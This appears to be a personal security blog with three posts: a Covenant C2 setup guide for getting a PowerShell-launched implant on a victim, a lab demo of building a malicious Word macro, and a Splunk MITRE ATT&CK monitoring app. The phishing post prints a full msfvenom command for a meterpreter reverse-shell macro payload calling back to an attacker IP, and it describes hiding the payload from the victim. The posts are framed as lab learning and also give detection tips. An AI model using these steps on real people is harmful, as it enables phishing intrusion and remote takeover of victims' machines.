Search

Updated: Oct 2

Hey Guys,

So I have been wanting to move away from Metasploit for a little while now and after seeing how our internal Red Team works it was apparent that I needed to open my eyes to more tools. Now I cant afford Cobalt Strike and its doubtful that I would even be granted a copy unless I managed to get it through work, this is due to the triage process that they have to adhere to. So after a little digging and some suggestions from the Red Team, Covenant seemed to be the way to go.

I got Covenant installed and at that point I really wasn't sure how to use it and after a ton of Googling I still couldn't really find anything that kinda pointed me in the right direction so I wanted to create a short blog on how to setup a Listener, create a PowerShell Launcher and then hopefully gain your Grunt allowing you to take your attack forward.

Obviously anything you learn here is educational only and anything you do with the knowledge going forward is your responsibility and yours alone. I have my own lab setup so I can test out different tools etc, I would suggest you do the same.

Covenant can be found here -> https://github.com/cobbr/Covenant

Install guide here -> https://github.com/cobbr/Covenant/wiki/Installation-And-Startup

Kali install commands here -> https://dotnet.microsoft.com/download/linux-package-manager/debian9/sdk-2.2.402

Be sure to use DotNet SDK version 2.2 as at the time of writing ver 3.0 will NOT work.

okay so lets get started, first fire up your Kali box and run the following commands in order -

1. wget -qO- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg

2. sudo mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/

3. wget -q https://packages.microsoft.com/config/debian/9/prod.list

4. sudo mv prod.list /etc/apt/sources.list.d/microsoft-prod.list

5. sudo chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg

6. sudo chown root:root /etc/apt/sources.list.d/microsoft-prod.list

7. sudo apt-get update

8. sudo apt-get install apt-transport-https

9. sudo apt-get update

10. sudo apt-get install dotnet-sdk-2.2

11. git clone --recurse-submodules https://github.com/cobbr/Covenant

12. cd Covenant/Covenant

13. dotnet build

14. dotnet run

That should look something like the below,

and by the end look something like this.

Once you're at this point you should see that Covenant is running and if you navigate over to https://0.0.0.0:7443 you should be good to go. Note that the ip is 0.0.0.0 as Covenant is being ran locally, if this was in AWS for example the ip would be different.

You may need to add an exception so go ahead and do that.

After that you should see the Covenant landing page, happy days your all setup and ready to go, bang in a username and password.

So once logged in you will see all the following options, Listeners, Launchers among others. I'm not going to run through them all, you can look at them all yourself and get to grips with them in your own time.

So what I wanted to go through were the basic steps to get a Grunt running using the PowerShell Launcher, so first we need to create a Listener. Fill in the details, so give it a name and add in your connect address ip, this is the ip of your attacking system.

Next we need to create the Launcher, this time I'm going with the PowerShell Launcher, fill in the options so select your Listener etc etc and what I'm going to do is take hit the Generate button and then copy the Encoded command into a custom script I have. There are multiple ways from here so you could host your launcher from within Covenant, you can down load it and send however you see fit, it's really up to you.

Encoded command

This is then pasted into my script.

And that's about it really, as suggested above how you have your victim connect to you is personal preference, mostly this would be via a link or phishing email of course.

So for this example I just ran the script on my victim system, again this can be hosted via Covenant or emails etc.

The connection is then activated.

Opening the Grunt provides a whole host of information as seen below.

Then the magic is here in the Interact tab, I have just ran a quick whoami but there are all sorts of tasks already built in and I know that Rastamouse and Cobbr are working hard to create all sorts of awesome new features.

If you have read any of my previous posts you will know that I was working on a Splunk Mitre Att&ck detection app, it looks like the image below and can be downloaded here -> https://github.com/CyberZombi3/Mitre-Attack-Monitoring this is free if you wish to take a look. It's very high level and would need tuning etc for any work environment however as you can see it would pick up the above method of attack. This should not however be relied on to detect any and all methods of attack.

So I hope this has been of use to someone as always if you want to ask any questions you can find me @CyberZombi3 on the Twitter.

Thanks

CyberZombi3

Apologies for the lack of posts, I've been a little busy lately with getting a room sorted for my recently announced little one, along with my GPEN and my OSCP and just life in general, things have been a little manic to say the least.

Anyway I wanted to post something along the lines of Phishing and how it may look in my Splunk app, Mitre Att&ck Monitoring. Then whilst I was working on it I realised I cant really show everything I would want as I don't have that setup within my lab, So I guess will demo how to create a malicious document, email it to a victim to run and then talk a little about what to look out for.

The below is just a high level view of the above mentioned process with what tools I have available to me.

So I created a macro and payload using MsfVenom with the following command - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.140.17 LPORT=4545 -e x86/shikata_ga_nai -f vba-exe

This then goes off and creates some vba code and a payload both need to be inserted into your malicious word document, it looks a little like below.

These then need to be added into the Word doc as you can see below. Just go ahead and copy and paste the code into the blank vba screen.

Create a nice looking document that suits the needs of your victim. Notice below the grey shaded area, that's the payload code that for this demo I have shrunk down the text size and changed the colour to white just so its not immediately seen, this could be hidden in an image or the footer that's really up to you how you want to go about hiding it.

So now were ready to send the email. It appears in the victims inbox as expected.

The user then opens the file and the payload runs. The user maybe prompted to enable editing. I found that that wasn't always the case when playing around with this. From then on in we can see in Splunk the word doc and what looks to be a strange looking executable ran at the time of execution.

This can then be confirmed from your newly gained Meterpreter session. Below we see the creation and the connection made.

As the attacker you can then go off and do what it is you need to do, escalate privileges, steal data etc etc.

So I also wanted to talk about what you can lookout for in your monitoring tools, things like -

obscure file names

office applications spawning processors

office applications attempting to connect to unknown URL's

discovery commands being ran by strange user accounts, maybe at strange times of the day, for example whoami ipconfig net accounts.

.HTA files within emails

If there are links in the email, hover over them to check the URL

if possible configure IDS / IPS & APT

Educate users via phishing simulations

The Splunk app I'm working on looks for all types of things based off the Mitre Att&ck framework but 1 or 2 events alone doesn't automatically mean malicious activity is occurring, with my app I want to get your attention by highlighting a whole bunch of events, then you will need to manually go off and build that bigger picture of an incident if there is one of course.

Below there are a few screenshots, I've mentioned it in some of my previous posts so you may have seen it before. I could probably release it as is now although its far from complete and currently does not cover the entire MA framework, let me know what you think.

For anyone wanting to have a play around with Phishing I came across the Morning Catch VM a while back and although it's a little dated now it still does the job.

Find out more about it here - https://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/

Obviously the information above should not be used to be internationally malicious and if that is your choice I cannot be held responsible for any of your actions, this post is for educational purpose only.

Find me on Twitter @CyberZombi3

Cheers

#Hacking#Hacking #Hacker#Hacker #RedTeam#RedTeam #BlueteamBlueteam #ITSecurityITSecurity #Noob#Noob #Splunk#Splunk #Monitoring#Monitoring #MitreAttack#MitreAttack #Phishing

So just a short post really, as you know I have been working on a Mitre Att&ck Splunk dashboard but due to my GPEN course and OSCP among many other distractions so far this year progress has been slow.

However over the last few days I have managed to build out my own Splunk app which is named Mitre Att&ck Monitoring (see below). The reason behind this was that I had a dashboard full of items that ran every however often and it was just slow and kept crashing out, I figured it would be better to break the items up into the sections from the Mitre Att&ck Framework and go from there.

I might end up uploading it to SplunkBase when its closer to being finished but for now I'm happy to keep plodding on with it.

anyway as always if you have any questions yell at me on Twitter @CyberZombi3 Thanks CyberZombi3 #Hacking#Hacking #Hacker#Hacker #RedTeam#RedTeam #Blueteam#Blueteam #ITSecurity#ITSecurity #Noob#Noob #Splunk#Splunk #Monitoring#Monitoring #MitreAttack#MitreAttack #BlueTeam#BlueTeam